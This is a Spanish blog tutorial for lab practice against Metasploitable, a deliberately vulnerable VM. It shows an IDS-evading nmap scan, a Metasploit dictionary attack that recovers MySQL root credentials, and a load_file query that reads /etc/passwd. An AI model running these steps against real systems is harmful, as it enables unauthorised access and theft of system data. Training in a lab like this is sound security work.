Hoy vamos a presentar Metasploitable, que es una distribución GNU/Linux vulnerable basada en Ubuntu 8.04 server (Hardy Heron) que poseé varias vulnerabilidades: como pueden ser credenciales de acceso poco robustas, y servicios vulnerables como distcc, tikiwiki y mysql.
Image may be NSFW.
Clik here to view.Descarga Metasploitable (torrent)
La distro ya viene instalada como imagen de VMware y para arrancar el servidor solo necesitamos VMware Player que es gratuito. Una vez instalado y configurada la red en modo Bridge para poder realizar la explotación desde Backtrack (o Metasploit desde Windows y Nmap).
Una vez se nos haya descargado la máquina virtual solamente tenemos que descomprimir y abrir el archivo con VMware Player. La ponemos en marcha y cuando nos pida credenciales ponemos msfadmin / msfadmin:
Image may be NSFW.
Clik here to view.
Una vez logueados haremos un ifconfig para ver que ip tenemos asociada (en nuestro caso 192.168.0.2) y nos pasaremos a Backtrack para comenzar a jugar!
Image may be NSFW.
Clik here to view.
Una vez en Backtrack comenzaremos realizando un nmap para descubrir puertos abiertos y servicios vulnerables:
nmap -sS -sV -O -f -n 192.168.0.2
-sS Análisis TCP SYN
-sV Detección de la versión de servicios
-O Activar detección del sistema operativo
-f Fragmentar paquetes (para evadir firewalls o IDS)
-n No realizar resolución DNS
El resultado de nmap es el siguiente
Image may be NSFW.
Clik here to view.
Podemos observar que nos indica que el servidor está ejecutando mysql 5.0.51a, pues desde Metasploit buscamos modulos relacionados con mysql:
Image may be NSFW.
Clik here to view.
Cargamos scanner/mysql/mysql_login para realizar un ataque de diccionario contra el servicio mysql del server y con show options vemos las opciones del módulo:
Image may be NSFW.
Clik here to view.
Cambiaremos las opciones como vienen aquí, donde diccionario.txt es este archivo:
msf auxiliary(mysql_login) > set PASS_FILE /root/diccionario.txt PASS_FILE => /root/diccionario.txt setmsf auxiliary(mysql_login) > set USER_FILE /root/diccionario.txt USER_FILE => /root/diccionario.txt msf auxiliary(mysql_login) > set RHOSTS 192.168.0.2 RHOSTS => 192.168.0.2 msf auxiliary(mysql_login) > run
Ahora probará las distintas combinaciones de credenciales usuario / contraseña y cuando haya encontrado los credenciales nos devolverá esto:
[*] 192.168.0.2:3306 Trying username:'root' with password:'root' [+] 192.168.0.2:3306 - SUCCESSFUL LOGIN 'root' : 'root'
Ya sabemos que las credenciales de acceso al servidor mysql son root / root. Nos conectamos y nos identificamos:
Image may be NSFW.
Clik here to view.
Una vez logueados en mysql podemos obtener el archivo /etc/passwd para ver los usuarios que tenemos en el sistema.
mysql> select load_file('/etc/passwd');
y obtendremos esto:
Image may be NSFW.
Clik here to view.
Esto es todo por hoy, en sucesivas entradas veremos cómo explotar otros servicios de Metasploitable.
Happy training!